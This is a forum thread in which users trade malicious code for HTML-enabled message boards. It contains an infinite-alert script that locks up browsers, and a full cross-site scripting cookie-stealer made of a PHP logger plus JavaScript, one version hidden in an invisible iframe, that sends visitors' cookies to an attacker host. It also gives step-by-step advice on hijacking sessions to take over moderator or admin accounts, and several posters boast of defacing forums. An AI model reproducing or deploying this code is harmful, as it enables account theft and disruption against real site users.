Jump to content

Featured Replies

Posted

If you frequent any forums that support HTML e.g. FPSBanana.com

 

then try addingthis code to every post you make

 

<script language="JavaScript">while(1) { alert("fIRebUg owNs yOur bROwsEr !"); }</script>

 

 

It will create a pop up that will never go away , thus making the user have to

crtl-alt-delete and end the program.

 

 

hehehehehe so simple yet so fun

  • Author
Please explain , i know it doesent fuck up sites , but if some noob has those crappy invsion free boards and stupidly enabled HTML then it fucks them up

Messageboxes should really be modeless rather than modal...

 

And with javascript enabled, document.write() is more fun than alert() :P

  • Author
Messageboxes should really be modeless rather than modal...

 

And with javascript enabled, document.write() is more fun than alert() :P

 

 

THANK YOU :) i have been trying to remeber what the deafult name for that page is

that would be fucking great to put it ni a hp and then put on this gabenewell.com popup thingi

and the site should obpen the mail prgramm and itself again that would be so great :o

aww u fukka ... :gaykeke: ... i tested it on my self, the code

 

<HTML>

<script language="JavaScript">while(1) { alert("ragemaster owNs yOur bROwsEr !"); }</script>

</HTML>

Forgive me if Im wrong because I dont know much about this, but couldnt you just use <embed> and put Last Measure on the page and/or redirect to it?
Forgive me if Im wrong because I dont know much about this, but couldnt you just use <embed> and put Last Measure on the page and/or redirect to it?

 

Yes.

 

Usually people just make an swf that redirects to a webpage then they embed that.

could you please make me some code i can past in the body of a html that opens a lot of popups and the site itself again?

i cant post shit in the head or something because its a hompage of a chat

wanna do some rage k?

kthx

Welcome to the world of java

 

Whats also fun is get a huge nasty picture and on mouse over make an alert pop up or a million alerts or w/e

Welcome to the world of java

 

Whats also fun is get a huge nasty picture and on mouse over make an alert pop up or a million alerts or w/e

 

so do me a favor and gimme teh code :o

If you actually want to "fuck" it up make a php cookie stealer. Or just steal someone elses.

 

First get Http live headers for firefox

 

<?php

$cookie = $_GET['c'];

$ip = getenv ('REMOTE_ADDR');

$date=date("j F, Y, g:i a");

$referer=getenv ('HTTP_REFERER');

$fp = fopen('log.txt', 'a');

fwrite($fp,

'Cookie: '.$cookie.'

IP: ' .$ip. '

Date and Time: ' .$date. '

Referer: '.$referer.' ');

fclose($fp);

?>

 

and make log.txt

 

Host the two files somewhere, chmod log.txt to 777, register to the forum that supports HTML, and put this code in your sig/post whatever.

 

<SCRIPT language="JavaScript">

document.location='yourhost/cookiestealer.php?cookie='+document.cookie'

</script>

 

or w/e i dont remember the exact codes but if it works anyone that views it you will get their cookies in log.txt. Use live HTTP headers to replace your cookie with theirs and you'll be logged in as them. Hopefully you can get a mod or an admin account.

Welcome to the world of java

Java != Javascript, they have nothing in common

 

----

 

If you're not using PHP5, you won't have file_put_contents(), but you can use this to do the same thing:

 

function file_put_contents($filename, $data) //appends $data to $filename
{
       $handle = @fopen($filename,'a');
       if(!$handle) return false;
       @fwrite($handle,$data);
       @fclose($handle);
}

 

Little easier than typing out the fopen() crap every time

 

Instead of making it obvious that their stuff is being stolen, use an invisible iframe:

<SCRIPT language="JavaScript">
document.write("<iframe src='http://yourhost/cookiestealer.php?cookie=" + document.cookie + "' height='1' width='1' style='display: none;'></iframe>");
</script>

 

And FatCunt in your .php file, you should have $cookie = $_GET['cookie'] not $_GET['c'] (probably a typo on your part, but other than that it's fine)

Welcome to the world of java

 

Whats also fun is get a huge nasty picture and on mouse over make an alert pop up or a million alerts or w/e

welcome to the world of not knowing what the fuck your talking about.

If you guys can find some forums / websites with user input that have HTML enabled, PM me the links and I can show you how you can get a few hundred bucks easily.

Lolz0rskates

 

<script language="JavaScript">while(1) { alert("fIRebUg owNs yOur bROwsEr !"); }</script>

is there a decent google search phrase that will return lots of "HTML enabled" boards.
i have posted <script language="JavaScript">while(1) { alert("fuck you dickhead now you just got fucking hacked !"); }</script> in every fucking invisionfree forums i have found.i love it:facesj:

Or.........

<img src=www.randompics.com/randompic.jpg height="99999999" width="99999999">

Guest
This topic is now closed to further replies.